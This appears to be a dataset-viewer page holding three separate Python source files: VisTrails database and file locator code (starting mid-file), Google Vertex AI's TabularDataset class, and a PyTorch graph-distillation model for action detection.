config['passwd'] = self._passwd
except VistrailsDBException, e:
debug.critical('VisTrails DB Exception', e)
config['succeeded'] = False
if config['succeeded'] == True:
self._host = config['host']
self._port = config['port']
self._db = config['db']
self._user = config['user']
self._passwd = config['passwd']
self.ext_connection_id = self.set_connection_info(**config)
return True
return False
return False
def find_connection_info(self, host, port, db):
"""find_connection_info(host:str, port: int, db: str) -> dict
Returns complete info of a connection with the given parameters
"""
id = self.__list.find_db_connection(host,port,db)
if id != -1:
return self.get_connection_info(id)
else:
return None
def get_connection_info(self, id):
"""get_connection_info(id: int) -> dict
Returns info of ExtConnection """
conn = self.__list.get_connection(id)
if conn is not None:
succeeded = False
key = str(conn.id) + "." + conn.name + "." + conn.host
passwd = DBLocator.keyChain.get_key(key)
config = {'host': conn.host,
'port': conn.port,
'user': conn.user,
'passwd': passwd}
try:
test_db_connection(config)
succeeded = True
except VistrailsDBException:
succeeded = False
config['id'] = conn.id
config['name'] = conn.name
config['db'] = conn.database
config['succeeded'] = succeeded
else:
config = None
return config
def set_connection_info(self, *args, **kwargs):
"""set_connection_info(id: int, name: str, host: str, port:int,
user:str, passwd:str, db:str) -> None
If the connection exists it will update it, else it will add it
"""
id = kwargs["id"]
name = kwargs["name"]
host = kwargs["host"]
port = kwargs["port"]
user = kwargs["user"]
passwd = kwargs["passwd"]
db = kwargs["db"]
conn = DBConnection(id=id,
name=name,
host=host,
port=port,
user=user,
passwd='',
database=db,
dbtype='MySQL')
if self.__list.has_connection(id):
self.__list.set_connection(id,conn)
else:
if conn.id == -1:
conn.id = self.__list.get_fresh_id()
self.__list.add_connection(conn)
key = str(conn.id) + "." + conn.name + "." + conn.host
DBLocator.keyChain.set_key(key,passwd)
return conn.id
##########################################################################
def __eq__(self, other):
if type(other) != type(self):
return False
return (self._host == other._host and
self._port == other._port and
self._db == other._db and
self._user == other._user and
#self._name == other._name and
self._obj_id == other._obj_id and
self._obj_type == other._obj_type)
##########################################################################
@staticmethod
def prompt_autosave(parent_widget):
return True
@staticmethod
def load_from_gui(parent_widget, obj_type):
import vistrails.gui.extras.core.db.locator as db_gui
return db_gui.get_load_db_locator_from_gui(parent_widget, obj_type)
@staticmethod
def save_from_gui(parent_widget, obj_type, locator=None):
import vistrails.gui.extras.core.db.locator as db_gui
return db_gui.get_save_db_locator_from_gui(parent_widget, obj_type,
locator)
@staticmethod
def from_xml(node, include_name=False):
locator = _DBLocator.from_xml(node, include_name)
locator.__class__ = DBLocator
return locator
@staticmethod
def convert(locator):
locator.__class__ = DBLocator
locator.__list = ExtConnectionList.getInstance(
default_connections_file())
class ZIPFileLocator(_ZIPFileLocator, CoreLocator):
def __init__(self, filename, **kwargs):
_ZIPFileLocator.__init__(self, filename, **kwargs)
def load(self, klass=None):
from vistrails.core.vistrail.vistrail import Vistrail
if klass is None:
klass = Vistrail
save_bundle = _ZIPFileLocator.load(self, klass.vtType)
for obj in save_bundle.get_db_objs():
klass = self.get_convert_klass(obj.vtType)
klass.convert(obj)
obj.locator = self
return save_bundle
def save(self, save_bundle):
save_bundle = _ZIPFileLocator.save(self, save_bundle, False)
for obj in save_bundle.get_db_objs():
klass = self.get_convert_klass(obj.vtType)
klass.convert(obj)
obj.locator = self
return save_bundle
def save_as(self, save_bundle, version=None):
save_bundle = _ZIPFileLocator.save(self, save_bundle, True, version)
for obj in save_bundle.get_db_objs():
klass = self.get_convert_klass(obj.vtType)
klass.convert(obj)
obj.locator = self
# Need to update thumbnail cache since files have moved
ThumbnailCache.getInstance().add_entries_from_files(save_bundle.thumbnails)
return save_bundle
##########################################################################
def __eq__(self, other):
if not isinstance(other, ZIPFileLocator):
return False
return self._name == other._name
##########################################################################
@staticmethod
def prompt_autosave(parent_widget):
import vistrails.gui.extras.core.db.locator as db_gui
return db_gui.get_autosave_prompt(parent_widget)
@staticmethod
def load_from_gui(parent_widget, obj_type):
import vistrails.gui.extras.core.db.locator as db_gui
return db_gui.get_load_file_locator_from_gui(parent_widget, obj_type)
@staticmethod
def save_from_gui(parent_widget, obj_type, locator=None):
import vistrails.gui.extras.core.db.locator as db_gui
return db_gui.get_save_file_locator_from_gui(parent_widget, obj_type,
locator)
class FileLocator(CoreLocator):
def __new__(self, filename=None, **kwargs):
if filename:
lname = filename.lower()
if lname.endswith('.xml'):
return XMLFileLocator(filename, **kwargs)
elif lname.endswith('.vtl'):
return FileLocator.from_link_file(filename)
else:
return ZIPFileLocator(filename, **kwargs)
else:
#return class based on default file type
if vistrails_default_file_type() == '.vt':
return ZIPFileLocator
else:
return XMLFileLocator
@staticmethod
def prompt_autosave(parent_widget):
import vistrails.gui.extras.core.db.locator as db_gui
return db_gui.get_autosave_prompt(parent_widget)
@staticmethod
def load_from_gui(parent_widget, obj_type):
import vistrails.gui.extras.core.db.locator as db_gui
return db_gui.get_load_file_locator_from_gui(parent_widget, obj_type)
@staticmethod
def save_from_gui(parent_widget, obj_type, locator=None):
import vistrails.gui.extras.core.db.locator as db_gui
return db_gui.get_save_file_locator_from_gui(parent_widget, obj_type,
locator)
@staticmethod
def parse(element):
""" parse(element) -> XMLFileLocator
Parse an XML object representing a locator and returns an
XMLFileLocator or a ZIPFileLocator object.
"""
if str(element.getAttribute('type')) == 'file':
for n in element.childNodes:
if n.localName == "name":
filename = str(n.firstChild.nodeValue).strip(" \n\t")
return FileLocator(filename)
return None
else:
return None
#ElementTree port
@staticmethod
def from_xml(node):
"""from_xml(node:ElementTree.Element) -> XMLFileLocator or None
Parse an XML object representing a locator and returns a
XMLFileLocator or a ZIPFileLocator object."""
if node.tag != 'locator':
return None
type_ = node.get('type', '')
if str(type_) == 'file':
for child in node.getchildren():
if child.tag == 'name':
filename = child.text.encode('latin-1').strip()
return FileLocator(filename)
return None
@staticmethod
def from_link_file(filename):
"""from_link_file(filename: str) -> DBLocator
This will parse a '.vtl' file and will create a DBLocator. .vtl files
are vistrail link files and they are used to point vistrails to open
vistrails from the database on the web. """
def convert_from_str(value,type):
def bool_conv(x):
s = str(x).upper()
if s == 'TRUE':
return True
if s == 'FALSE':
return False
if value is not None:
if type == 'str':
return str(value)
elif value.strip() != '':
if type == 'long':
return long(value)
elif type == 'float':
return float(value)
elif type == 'int':
return int(value)
elif type == 'bool':
return bool_conv(value)
elif type == 'base64':
return base64.b64decode(value)
return None
def guess_extension_from_contents(contents):
if contents.startswith("<vistrail"):
return ".xml"
else:
return ".vt"
tree = ElementTree.parse(filename)
node = tree.getroot()
if node.tag != 'vtlink':
return None
#read attributes
data = node.get('host', None)
host = convert_from_str(data, 'str')
data = node.get('port', None)
port = convert_from_str(data,'int')
data = node.get('database', None)
database = convert_from_str(data,'str')
data = node.get('vtid')
vt_id = convert_from_str(data, 'int')
data = node.get('version')
version = convert_from_str(data, 'str')
data = node.get('tag')
tag = convert_from_str(data, 'str')
data = node.get('execute')
execute = convert_from_str(data, 'bool')
data = node.get('showSpreadsheetOnly')
showSpreadsheetOnly = convert_from_str(data, 'bool')
data = node.get('url', None)
url = convert_from_str(data,'str')
data = node.get('vtcontent', None)
vtcontent = convert_from_str(data,'base64')
data = node.get('filename', None)
vtname = convert_from_str(data, 'str')
data = node.get('forceDB',None)
forceDB = convert_from_str(data,'bool')
data = node.get('mashuptrail', None)
mashuptrail = convert_from_str(data, 'str')
data = node.get('mashupVersion', None)
mashupVersion = convert_from_str(data, 'int')
data = node.get('parameterExploration', None)
parameterExploration = convert_from_str(data, 'int')
#if execute is False, we will show the builder too
if showSpreadsheetOnly and not execute:
showSpreadsheetOnly = False
try:
version = int(version)
except (ValueError, TypeError):
pass
if tag is None:
tag = ''
## execute and showSpreadsheetOnly should be written to the current
## configuration
config = get_vistrails_configuration()
config.execute = execute
config.showWindow = not showSpreadsheetOnly
if not forceDB:
if vtcontent is not None:
if url is not None:
basename = url.split('/')[-1]
base,ext = os.path.splitext(basename)
dirname = os.path.dirname(filename)
fname = os.path.join(dirname,basename)
else:
basename = os.path.basename(filename)
base,ext = os.path.splitext(basename)
ext = guess_extension_from_contents(vtcontent)
dirname = os.path.dirname(filename)
fname = os.path.join(dirname,"%s%s"%(base,ext))
create_file = True
if os.path.exists(fname): #file was extracted before
create_file = False
oldf = open(fname)
oldcontents = oldf.read()
if oldcontents != vtcontent:
import vistrails.gui.extras.core.db.locator as db_gui
(overwrite, newname) = \
db_gui.ask_to_overwrite_file(None, 'vistrail')
create_file = True
if newname:
fname = newname
elif overwrite == False:
i=1
while os.path.exists(fname):
newbase = "%s_%s%s" % (base, i, ext)
fname = os.path.join(dirname,newbase)
i+=1
if create_file:
f = open(fname,'wb')
f.write(vtcontent)
f.close()
return FileLocator(fname, version_node=version, version_tag=tag,
mashuptrail=mashuptrail,
mashupVersion=mashupVersion,
parameterExploration=parameterExploration)
if host is not None:
user = ""
passwd = ""
return DBLocator(host, port, database,
user, passwd, None, obj_id=vt_id,
obj_type='vistrail',connection_id=None,
version_node=version, version_tag=tag,
mashuptrail=mashuptrail,
mashupVersion=mashupVersion,
parameterExploration=parameterExploration)
elif vtname is not None:
if os.path.dirname(vtname) == '':
#check if file exists in the same directory as the .vtl file
dirname = os.path.dirname(filename)
newvtname = os.path.join(dirname,vtname)
if os.path.exists(newvtname):
vtname = newvtname
#check for magic strings
if "@examples" in vtname:
vtname=vtname.replace("@examples", vistrails_examples_directory())
return FileLocator(vtname, version_node=version, version_tag=tag,
mashuptrail=mashuptrail,
mashupVersion=mashupVersion,
parameterExploration=parameterExploration)
import unittest
# Test vtl files in usersguide
class TestUsersGuideVTL(unittest.TestCase):
vtl_path = os.path.join(vistrails_root_directory(), '..', 'doc',
'usersguide', 'vtl')
@unittest.skipIf(not os.path.isdir(vtl_path), 'Could not find vtl dir')
def test_vtl_files(self):
from vistrails.tests.utils import run_file
for root, dirs, file_names in os.walk(self.vtl_path):
for file_name in sorted(file_names):
if file_name.endswith('.vtl'):
# update available packages
from vistrails.core.packagemanager import get_package_manager
get_package_manager().build_available_package_names_list()
f = os.path.join(root, file_name)
locator = FileLocator(f)
version = locator._vnode
# if there is a version specified try to execute it,
# else just load the pipeline
if version:
errors = run_file(f, lambda x: x == version)
self.assertEqual(errors, [], 'Errors processing %s: %s' % (f, str(errors)))
else:
import vistrails.core.db.io
from vistrails.core.vistrail.controller import \
VistrailController
loaded_objs = vistrails.core.db.io.load_vistrail(locator)
controller = VistrailController(loaded_objs[0],
locator,
*loaded_objs[1:])
controller.change_selected_version(
controller.vistrail.get_latest_version())
self.assertTrue(controller.current_pipeline.is_valid,
"Latest pipeline is invalid: %s" % f)
| |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import csv
import logging
from typing import Dict, List, Optional, Sequence, Set, Tuple, Union
from google.auth import credentials as auth_credentials
from google.cloud import bigquery
from google.cloud import storage
from google.cloud.aiplatform import datasets
from google.cloud.aiplatform.datasets import _datasources
from google.cloud.aiplatform import initializer
from google.cloud.aiplatform import schema
from google.cloud.aiplatform import utils
class TabularDataset(datasets._Dataset):
"""Managed tabular dataset resource for Vertex AI."""
_supported_metadata_schema_uris: Optional[Tuple[str]] = (
schema.dataset.metadata.tabular,
)
@property
def column_names(self) -> List[str]:
"""Retrieve the columns for the dataset by extracting it from the Google Cloud Storage or
Google BigQuery source.
Returns:
List[str]
A list of columns names
Raises:
RuntimeError: When no valid source is found.
"""
self._assert_gca_resource_is_available()
metadata = self._gca_resource.metadata
if metadata is None:
raise RuntimeError("No metadata found for dataset")
input_config = metadata.get("inputConfig")
if input_config is None:
raise RuntimeError("No inputConfig found for dataset")
gcs_source = input_config.get("gcsSource")
bq_source = input_config.get("bigquerySource")
if gcs_source:
gcs_source_uris = gcs_source.get("uri")
if gcs_source_uris and len(gcs_source_uris) > 0:
# Lexicographically sort the files
gcs_source_uris.sort()
# Get the first file in sorted list
# TODO(b/193044977): Return as Set instead of List
return list(
self._retrieve_gcs_source_columns(
project=self.project,
gcs_csv_file_path=gcs_source_uris[0],
credentials=self.credentials,
)
)
elif bq_source:
bq_table_uri = bq_source.get("uri")
if bq_table_uri:
# TODO(b/193044977): Return as Set instead of List
return list(
self._retrieve_bq_source_columns(
project=self.project,
bq_table_uri=bq_table_uri,
credentials=self.credentials,
)
)
raise RuntimeError("No valid CSV or BigQuery datasource found.")
@staticmethod
def _retrieve_gcs_source_columns(
project: str,
gcs_csv_file_path: str,
credentials: Optional[auth_credentials.Credentials] = None,
) -> Set[str]:
"""Retrieve the columns from a comma-delimited CSV file stored on Google Cloud Storage
Example Usage:
column_names = _retrieve_gcs_source_columns(
"project_id",
"gs://example-bucket/path/to/csv_file"
)
# column_names = {"column_1", "column_2"}
Args:
project (str):
Required. Project to initiate the Google Cloud Storage client with.
gcs_csv_file_path (str):
Required. A full path to a CSV files stored on Google Cloud Storage.
Must include "gs://" prefix.
credentials (auth_credentials.Credentials):
Credentials to use to with GCS Client.
Returns:
Set[str]
A set of columns names in the CSV file.
Raises:
RuntimeError: When the retrieved CSV file is invalid.
"""
gcs_bucket, gcs_blob = utils.extract_bucket_and_prefix_from_gcs_path(
gcs_csv_file_path
)
client = storage.Client(project=project, credentials=credentials)
bucket = client.bucket(gcs_bucket)
blob = bucket.blob(gcs_blob)
# Incrementally download the CSV file until the header is retrieved
first_new_line_index = -1
start_index = 0
increment = 1000
line = ""
try:
logger = logging.getLogger("google.resumable_media._helpers")
logging_warning_filter = utils.LoggingFilter(logging.INFO)
logger.addFilter(logging_warning_filter)
while first_new_line_index == -1:
line += blob.download_as_bytes(
start=start_index, end=start_index + increment - 1
).decode("utf-8")
first_new_line_index = line.find("\n")
start_index += increment
header_line = line[:first_new_line_index]
# Split to make it an iterable
header_line = header_line.split("\n")[:1]
csv_reader = csv.reader(header_line, delimiter=",")
except (ValueError, RuntimeError) as err:
raise RuntimeError(
"There was a problem extracting the headers from the CSV file at '{}': {}".format(
gcs_csv_file_path, err
)
)
finally:
logger.removeFilter(logging_warning_filter)
return set(next(csv_reader))
@staticmethod
def _get_bq_schema_field_names_recursively(
schema_field: bigquery.SchemaField,
) -> Set[str]:
"""Retrieve the name for a schema field along with ancestor fields.
Nested schema fields are flattened and concatenated with a ".".
Schema fields with child fields are not included, but the children are.
Args:
project (str):
Required. Project to initiate the BigQuery client with.
bq_table_uri (str):
Required. A URI to a BigQuery table.
Can include "bq://" prefix but not required.
credentials (auth_credentials.Credentials):
Credentials to use with BQ Client.
Returns:
Set[str]
A set of columns names in the BigQuery table.
"""
ancestor_names = {
nested_field_name
for field in schema_field.fields
for nested_field_name in TabularDataset._get_bq_schema_field_names_recursively(
field
)
}
# Only return "leaf nodes", basically any field that doesn't have children
if len(ancestor_names) == 0:
return {schema_field.name}
else:
return {f"{schema_field.name}.{name}" for name in ancestor_names}
@staticmethod
def _retrieve_bq_source_columns(
project: str,
bq_table_uri: str,
credentials: Optional[auth_credentials.Credentials] = None,
) -> Set[str]:
"""Retrieve the column names from a table on Google BigQuery
Nested schema fields are flattened and concatenated with a ".".
Schema fields with child fields are not included, but the children are.
Example Usage:
column_names = _retrieve_bq_source_columns(
"project_id",
"bq://project_id.dataset.table"
)
# column_names = {"column_1", "column_2", "column_3.nested_field"}
Args:
project (str):
Required. Project to initiate the BigQuery client with.
bq_table_uri (str):
Required. A URI to a BigQuery table.
Can include "bq://" prefix but not required.
credentials (auth_credentials.Credentials):
Credentials to use with BQ Client.
Returns:
Set[str]
A set of column names in the BigQuery table.
"""
# Remove bq:// prefix
prefix = "bq://"
if bq_table_uri.startswith(prefix):
bq_table_uri = bq_table_uri[len(prefix) :]
client = bigquery.Client(project=project, credentials=credentials)
table = client.get_table(bq_table_uri)
schema = table.schema
return {
field_name
for field in schema
for field_name in TabularDataset._get_bq_schema_field_names_recursively(
field
)
}
@classmethod
def create(
cls,
display_name: str,
gcs_source: Optional[Union[str, Sequence[str]]] = None,
bq_source: Optional[str] = None,
project: Optional[str] = None,
location: Optional[str] = None,
credentials: Optional[auth_credentials.Credentials] = None,
request_metadata: Optional[Sequence[Tuple[str, str]]] = (),
labels: Optional[Dict[str, str]] = None,
encryption_spec_key_name: Optional[str] = None,
sync: bool = True,
) -> "TabularDataset":
"""Creates a new tabular dataset.
Args:
display_name (str):
Required. The user-defined name of the Dataset.
The name can be up to 128 characters long and can be consist
of any UTF-8 characters.
gcs_source (Union[str, Sequence[str]]):
Google Cloud Storage URI(-s) to the
input file(s). May contain wildcards. For more
information on wildcards, see
https://cloud.google.com/storage/docs/gsutil/addlhelp/WildcardNames.
examples:
str: "gs://bucket/file.csv"
Sequence[str]: ["gs://bucket/file1.csv", "gs://bucket/file2.csv"]
bq_source (str):
BigQuery URI to the input table.
example:
"bq://project.dataset.table_name"
project (str):
Project to upload this model to. Overrides project set in
aiplatform.init.
location (str):
Location to upload this model to. Overrides location set in
aiplatform.init.
credentials (auth_credentials.Credentials):
Custom credentials to use to upload this model. Overrides
credentials set in aiplatform.init.
request_metadata (Sequence[Tuple[str, str]]):
Strings which should be sent along with the request as metadata.
labels (Dict[str, str]):
Optional. Labels with user-defined metadata to organize your Tensorboards.
Label keys and values can be no longer than 64 characters
(Unicode codepoints), can only contain lowercase letters, numeric
characters, underscores and dashes. International characters are allowed.
No more than 64 user labels can be associated with one Tensorboard
(System labels are excluded).
See https://goo.gl/xmQnxf for more information and examples of labels.
System reserved label keys are prefixed with "aiplatform.googleapis.com/"
and are immutable.
encryption_spec_key_name (Optional[str]):
Optional. The Cloud KMS resource identifier of the customer
managed encryption key used to protect the dataset. Has the
form:
``projects/my-project/locations/my-region/keyRings/my-kr/cryptoKeys/my-key``.
The key needs to be in the same region as where the compute
resource is created.
If set, this Dataset and all sub-resources of this Dataset will be secured by this key.
Overrides encryption_spec_key_name set in aiplatform.init.
sync (bool):
Whether to execute this method synchronously. If False, this method
will be executed in concurrent Future and any downstream object will
be immediately returned and synced when the Future has completed.
Returns:
tabular_dataset (TabularDataset):
Instantiated representation of the managed tabular dataset resource.
"""
utils.validate_display_name(display_name)
if labels:
utils.validate_labels(labels)
api_client = cls._instantiate_client(location=location, credentials=credentials)
metadata_schema_uri = schema.dataset.metadata.tabular
datasource = _datasources.create_datasource(
metadata_schema_uri=metadata_schema_uri,
gcs_source=gcs_source,
bq_source=bq_source,
)
return cls._create_and_import(
api_client=api_client,
parent=initializer.global_config.common_location_path(
project=project, location=location
),
display_name=display_name,
metadata_schema_uri=metadata_schema_uri,
datasource=datasource,
project=project or initializer.global_config.project,
location=location or initializer.global_config.location,
credentials=credentials or initializer.global_config.credentials,
request_metadata=request_metadata,
labels=labels,
encryption_spec=initializer.global_config.get_encryption_spec(
encryption_spec_key_name=encryption_spec_key_name
),
sync=sync,
)
def import_data(self):
raise NotImplementedError(
f"{self.__class__.__name__} class does not support 'import_data'"
)
| |
# Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Model to train detection."""
from collections import OrderedDict
import numpy as np
import torch
import torch.backends.cudnn as cudnn
import torch.optim as optim
import utils
from nets.get_tad import *
from nets.get_distillation_kernel import *
CNN_MODALITIES = ['rgb', 'oflow', 'depth']
GRU_MODALITIES = ['jjd', 'jjv', 'jld']
class BaseModel:
def __init__(self, modalities, n_classes, n_frames, n_channels, input_sizes,
hidden_size, n_layers, dropout, hidden_size_seq, n_layers_seq,
dropout_seq, bg_w, lr, lr_decay_rate, to_idx, ckpt_path):
super(BaseModel, self).__init__()
cudnn.benchmark = True
utils.info('{} modality'.format(modalities[to_idx]))
self.embeds = []
for i, m in enumerate(modalities):
encoder_type = 'cnn' if m in CNN_MODALITIES else 'rnn'
embed = nn.DataParallel(
get_tad(n_classes, n_frames, n_channels[i], input_sizes[i],
hidden_size, n_layers, dropout, hidden_size_seq, n_layers_seq,
dropout_seq, encoder_type).cuda())
self.embeds.append(embed)
# Multiple optimizers
self.optimizers = []
self.lr_decay_rates = []
# Visual encoder: SGD
visual_params = list(self.embeds[to_idx].module.embed.parameters())
visual_optimizer = optim.SGD(
visual_params, lr=lr, momentum=0.9, weight_decay=5e-4)
self.optimizers.append(visual_optimizer)
self.lr_decay_rates.append(lr_decay_rate)
# Sequence encoder: Adam
sequence_params = list(self.embeds[to_idx].module.rnn.parameters()) + \
list(self.embeds[to_idx].module.fc.parameters())
sequence_optimizer = optim.Adam(sequence_params, lr=1e-3)
self.optimizers.append(sequence_optimizer)
self.lr_decay_rates.append(1) # No learning rate decay for Adam
# Weighted cross-entropy loss
self.criterion_cls = nn.CrossEntropyLoss(
torch.FloatTensor([bg_w] + [1] * n_classes)).cuda()
self.n_classes = n_classes
self.modalities = modalities
self.to_idx = to_idx
self.ckpt_path = ckpt_path
def _forward(self, inputs):
"""Forward pass for all modalities.
"""
logits, reprs = [], []
for i in range(len(inputs)):
logit, repr = self.embeds[i](inputs[i])
logits.append(logit)
reprs.append(repr)
logits = torch.stack(logits)
reprs = torch.stack(reprs)
return [logits, reprs]
def _backward(self, results, label):
raise NotImplementedError
def train(self, inputs, label):
"""Train model.
:param inputs: a list, each is batch_size x timestep x n_frames x (n_channels x h x w) or (input_size)
:param label: batch_size x timestep
"""
for embed in self.embeds:
embed.train()
for i in range(len(inputs)):
inputs[i] = Variable(inputs[i].cuda(), requires_grad=False)
label = Variable(label.cuda(), requires_grad=False)
results = self._forward(inputs)
info_loss = self._backward(results, label)
info_acc = self._get_acc(results[0], label)
return OrderedDict(info_loss + info_acc)
def test(self, inputs, label, timestep):
'''Test model.
param timestep: split into segments of length timestep.
'''
for embed in self.embeds:
embed.eval()
input = Variable(inputs[0].cuda(), requires_grad=False)
label = Variable(label.cuda(), requires_grad=False)
length = input.size(1)
# Split video into segments
input, start_indices = utils.get_segments(input, timestep)
inputs = [input]
logits, _ = self._forward(inputs)
logits = utils.to_numpy(logits).squeeze(0)
all_logits = [[] for i in range(length)]
for i in range(len(start_indices)):
s = start_indices[i]
for j in range(timestep):
all_logits[s + j].append(logits[i][j])
# Average logits for each time step.
final_logits = np.zeros((length, self.n_classes + 1))
for i in range(length):
final_logits[i] = np.mean(all_logits[i], axis=0)
logits = final_logits
info_acc = self._get_acc([torch.Tensor(logits)], label)
scores = utils.softmax(logits, axis=1)
return OrderedDict(info_acc), logits, scores
def _get_acc(self, logits, label):
"""Get detection statistics for modality.
"""
info_acc = []
for i, m in enumerate(self.modalities):
logit = logits[i].view(-1, self.n_classes + 1)
label = label.view(-1)
stats = utils.get_stats_detection(logit, label, self.n_classes + 1)
info_acc.append(('ap_{}'.format(m), stats[0]))
info_acc.append(('acc_{}'.format(m), stats[1]))
info_acc.append(('acc_bg_{}'.format(m), stats[2]))
info_acc.append(('acc_action_{}'.format(m), stats[3]))
return info_acc
def save(self, epoch):
path = os.path.join(self.ckpt_path, 'embed_{}.pth'.format(epoch))
torch.save(self.embeds[self.to_idx].state_dict(), path)
def load(self, load_ckpt_paths, options, epoch=200):
"""Load checkpoints.
"""
assert len(load_ckpt_paths) == len(self.embeds)
for i in range(len(self.embeds)):
ckpt_path = load_ckpt_paths[i]
load_opt = options[i]
if len(ckpt_path) == 0:
utils.info('{}: training from scratch'.format(self.modalities[i]))
continue
if load_opt == 0: # load teacher model (visual + sequence)
path = os.path.join(ckpt_path, 'embed_{}.pth'.format(epoch))
ckpt = torch.load(path)
try:
self.embeds[i].load_state_dict(ckpt)
except:
utils.warn('Check that the "modalities" argument is correct.')
exit(0)
utils.info('{}: ckpt {} loaded'.format(self.modalities[i], path))
elif load_opt == 1: # load pretrained visual encoder
ckpt = torch.load(ckpt_path)
# Change keys in the ckpt
new_state_dict = OrderedDict()
for key in list(ckpt.keys())[:-2]: # exclude fc weights
new_key = key[7:] # Remove 'module.'
new_state_dict[new_key] = ckpt[key]
# update state_dict
state_dict = self.embeds[i].module.embed.state_dict()
state_dict.update(new_state_dict)
self.embeds[i].module.embed.load_state_dict(state_dict)
utils.info('{}: visual encoder from {} loaded'.format(
self.modalities[i], ckpt_path))
else:
raise NotImplementedError
def lr_decay(self):
lrs = []
for optimizer, decay_rate in zip(self.optimizers, self.lr_decay_rates):
for param_group in optimizer.param_groups:
param_group['lr'] *= decay_rate
lrs.append(param_group['lr'])
return lrs
class SingleStream(BaseModel):
"""Model to train a single modality.
"""
def __init__(self, *args, **kwargs):
super(SingleStream, self).__init__(*args, **kwargs)
assert len(self.embeds) == 1
def _backward(self, results, label):
logits, _ = results
logits = logits.view(-1, logits.size(-1))
loss = self.criterion_cls(logits, label.view(-1))
loss.backward()
torch.nn.utils.clip_grad_norm(self.embeds[self.to_idx].parameters(), 5)
for optimizer in self.optimizers:
optimizer.step()
optimizer.zero_grad()
info_loss = [('loss', loss.data[0])]
return info_loss
class GraphDistillation(BaseModel):
"""Model to train with graph distillation.
xfer_to is the modality to train.
"""
def __init__(self, modalities, n_classes, n_frames, n_channels, input_sizes,
hidden_size, n_layers, dropout, hidden_size_seq, n_layers_seq,
dropout_seq, bg_w, lr, lr_decay_rate, to_idx, ckpt_path,
w_losses, w_modalities, metric, xfer_to, gd_size, gd_reg):
super(GraphDistillation, self).__init__(\
modalities, n_classes, n_frames, n_channels, input_sizes,
hidden_size, n_layers, dropout, hidden_size_seq, n_layers_seq, dropout_seq,
bg_w, lr, lr_decay_rate, to_idx, ckpt_path)
# Index of the modality to distill
to_idx = self.modalities.index(xfer_to)
from_idx = [x for x in range(len(self.modalities)) if x != to_idx]
assert len(from_idx) >= 1
# Prior
w_modalities = [w_modalities[i] for i in from_idx
] # remove modality being transferred to
gd_prior = utils.softmax(w_modalities, 0.25)
# Distillation model
self.distillation_kernel = \
get_distillation_kernel(n_classes + 1, hidden_size, gd_size, to_idx, from_idx,
gd_prior, gd_reg, w_losses, metric).cuda()
# Add optimizer to self.optimizers
gd_optimizer = optim.SGD(
self.distillation_kernel.parameters(),
lr=lr,
momentum=0.9,
weight_decay=5e-4)
self.optimizers.append(gd_optimizer)
self.lr_decay_rates.append(lr_decay_rate)
self.xfer_to = xfer_to
self.to_idx = to_idx
self.from_idx = from_idx
def _forward(self, inputs):
logits, reprs = super(GraphDistillation, self)._forward(inputs)
n_modalities, batch_size, length, _ = logits.size()
logits = logits.view(n_modalities, batch_size * length, -1)
reprs = reprs.view(n_modalities, batch_size * length, -1)
# Get edge weights of the graph
graph = self.distillation_kernel(logits, reprs)
return logits, reprs, graph
def _backward(self, results, label):
logits, reprs, graph = results # graph: size (len(from_idx) x batch_size)
label = label.view(-1)
info_loss = []
# Classification loss
loss_cls = self.criterion_cls(logits[self.to_idx], label)
# Graph distillation loss
loss_reg, loss_logit, loss_repr = \
self.distillation_kernel.distillation_loss(logits, reprs, graph)
loss = loss_cls + loss_reg + loss_logit + loss_repr
loss.backward()
torch.nn.utils.clip_grad_norm(self.embeds[self.to_idx].parameters(), 5)
for optimizer in self.optimizers:
optimizer.step()
optimizer.zero_grad()
info_loss = [('loss_cls', loss_cls.data[0]), ('loss_reg', loss_reg.data[0]),
('loss_logit', loss_logit.data[0]), ('loss_repr',
loss_repr.data[0])]
return info_loss
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.